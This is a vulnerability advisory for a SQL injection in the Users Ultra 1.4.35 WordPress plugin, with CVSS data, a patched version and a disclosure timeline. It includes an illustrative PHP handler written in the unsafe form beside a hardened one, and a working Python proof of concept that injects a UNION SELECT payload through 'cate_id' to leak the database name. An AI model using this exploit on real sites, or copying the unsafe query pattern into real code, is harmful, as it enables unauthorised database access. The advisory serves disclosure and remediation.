Users Ultra 1.4.35, SQL Injection
The AJAX action ‘edit_photo_cate’, defined in ‘users-ultra/addons/photocategories/admin/admin.php’, is vulnerable to SQL injection via the POST parameter ‘cate_id’. The parameter is passed into a call to the WordPress function ‘$wpdb->get_results()’ without being sanitized or bound through ‘$wpdb->prepare()’. The action is reachable by any logged-in user.
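To make the root cause concrete, the following is an added illustrative example, not code from the Users Ultra plugin: a hypothetical AJAX handler written in the unsafe pattern the advisory describes, beside a hardened version that checks the caller's capability and nonce and binds the id through ‘$wpdb->prepare()’. The table name, nonce action and function names are assumptions for the illustration.

```php
<?php
// Added illustrative example (not the plugin's own code). Table name, nonce
// action and function names are assumed for illustration.

// BEFORE: the request value is concatenated straight into the SQL string, so a
// cate_id such as "0 UNION ALL SELECT ..." is executed as part of the query.
function example_edit_photo_cate_unsafe() {
    global $wpdb;
    $cate_id = $_POST['cate_id'];
    $rows = $wpdb->get_results(
        "SELECT id, name FROM {$wpdb->prefix}example_photo_categories WHERE id = " . $cate_id
    );
    // ... render the edit form from $rows ...
}

// AFTER: authorise the caller, validate the id as an integer and bind it with a
// %d placeholder so only a number can ever reach the SQL string.
function example_edit_photo_cate_safe() {
    global $wpdb;

    // The advisory notes the action was reachable by any logged-in user; limit
    // it to users who are allowed to manage categories (capability is assumed).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    // Nonce check ties the request to a page the current user actually loaded.
    check_ajax_referer( 'example_photo_cate_nonce', 'nonce' );

    // absint() keeps only a non-negative integer; the injection string from
    // the advisory's PoC collapses to 0 here and is rejected.
    $cate_id = isset( $_POST['cate_id'] ) ? absint( $_POST['cate_id'] ) : 0;
    if ( 0 === $cate_id ) {
        wp_send_json_error( 'invalid category id', 400 );
    }

    // $wpdb->prepare() formats %d as an integer, so no attacker-controlled text
    // is ever spliced into the query.
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, name FROM {$wpdb->prefix}example_photo_categories WHERE id = %d",
            $cate_id
        )
    );
    // ... render the edit form from $rows ...
    wp_send_json_success( $rows );
}

// Register the hardened handler for logged-in AJAX requests.
add_action( 'wp_ajax_edit_photo_cate', 'example_edit_photo_cate_safe' );
```

The two fixes are independent: ‘$wpdb->prepare()’ closes the injection itself, while the capability and nonce checks reduce who can reach the handler in the first place, so a future bug in the query is exposed to far fewer accounts.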
Homepage: https://wordpress.org/plugins/users-ultra/
CVSS Score: 5.5
CVSS Vector: (AV:N/AC:L/Au:S/C:P/I:P/A:N)
Attack Scope: remote
Authorization Required: Registered
Mitigation: Update to version 1.4.36.
Proof of Concept
The PoC below outputs the second column of the injected query into the ‘value’ field of the first input element in the response; in this case that is the name of the current database, ‘wordpress’. The second column is also written into the ‘data-id’ attribute of the second and third input elements, but in this example we are selecting NULL there.
import requests

# Persistent session so the WordPress login cookie is reused for the AJAX call
s = requests.Session()
blog_url = 'http://localhost'

# Log in to WordPress as a registered (non-privileged) user
url = '%s/wp-login.php' % blog_url
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Trigger the MySQL injection through the edit_photo_cate AJAX action
url = '%s/wp-admin/admin-ajax.php' % blog_url
payload = {
    "action": "edit_photo_cate",
    "cate_id": "0 UNION ALL SELECT NULL,CAST(DATABASE() AS CHAR)#"
}
r = s.post(url, data=payload)

# The response HTML carries the second column in the first input's value attribute
print(r.text)
Output
~$ python g0blin-00030.py
<p>Name:</p><p><input type='text' value='wordpress' class='xoouserultra-input' id='uultra_photo_name_edit_'></p><p><input type='button' class='button-primary uultra-photocat-close' value='Close' data-id= > <input type='button' class='button-primary uultra-photocat-modify' data-id= value='Save'> </p>
Timeline
- 2015-02-02: Discovered
- 2015-02-02: Vendor notified
- 2015-02-02: Vendor responded
- 2015-02-02: Version 1.4.36 released – issue resolved
- 2015-02-09: Advisory released